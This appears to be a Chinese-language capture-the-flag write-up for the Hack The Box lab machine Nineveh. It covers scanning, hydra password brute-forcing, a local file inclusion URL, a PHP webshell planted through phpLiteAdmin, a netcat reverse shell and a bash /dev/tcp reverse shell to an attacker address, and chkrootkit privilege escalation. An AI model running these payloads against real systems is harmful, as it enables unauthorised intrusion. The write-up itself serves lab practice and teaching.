基本信息

端口扫描

80和443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -sC -sV 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 13:41 CST
Nmap scan report for 10.10.10.43
Host is up (0.071s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.95 seconds

80

apache默认页面:

443

一张图

目录扫描

80

80发现个department目录需要登录,info.php就是phpinfp:

1
2
3
4
5
6
➜  ~ gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt -t 50

/index.html (Status: 200)
/info.php (Status: 200)
/department (Status: 301)
/server-status (Status: 403)

443

443发现db,secure_notes等目录:

1
2
3
4
5
6
gobuster dir -u https://10.10.10.43/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt -t 50

/index.html (Status: 200)
/db (Status: 301)
/server-status (Status: 403)
/secure_notes (Status: 301)

phpLiteAdmin

db是phpLiteAdmin v1.9:

可以搜到相关漏洞:

但前提是需要登录

secure_notes

secure_notes里是一张很大的图:

直接查看strings的话能够发现里面藏了很多东西,包括ssh私钥,但当前并没有对外开放ssh端口,可以先保存下来:

密码爆破

可以爆破PHPLiteAdmin和department的密码:

1
2
3
4
5
hydra -l none -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V
[443][http-post-form] host: 10.10.10.43 login: none password: password123

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 -V
[80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t

LFI

department那里notes是有lfi,多次尝试发现文件名必须有ninevehNotes.txt才能包含:

1
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt*/../../../../../../etc/passwd

webshell

我们前面还有个phpLiteAdmin,这个是可以写php文件的,就是数据库表名用php代码,然后重命名数据库, 之后LFI:

1
2
3
4
5
<?php system($_REQUEST["miao"]);?>

/var/tmp/ninevehNotes.txt.php

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&miao=whoami

reverse shell

1
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&miao=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.3%204444%20%3E/tmp/f

knock

查看进程能够发现一个knockd:

搜索资料发现是用于隐藏ssh的,需要敲门才能够ssh:

所以可以直接去查看配置文件,得到敲门序列:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160

[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
$ ls /home
amrois

knock & ssh & user flag

1
2
3
4
5
6
7
sudo apt-get install knockd
knock 10.10.10.43 571 290 911
# 也可以nmap来进行
for x in 571 290 911; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.43; done

chmod 600 nineveh.priv
ssh -i nineveh.priv amrois@10.10.10.43

chkrootkit

如果运行pspy之类的可以发现/usr/bin/chkrootkit定时运行,而chkrootkit存在已知的本地提权漏洞:

提权 & root flag

就是在tmp下写一个update文件,等待触发

1
2
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.3/4445 0>&1

参考资料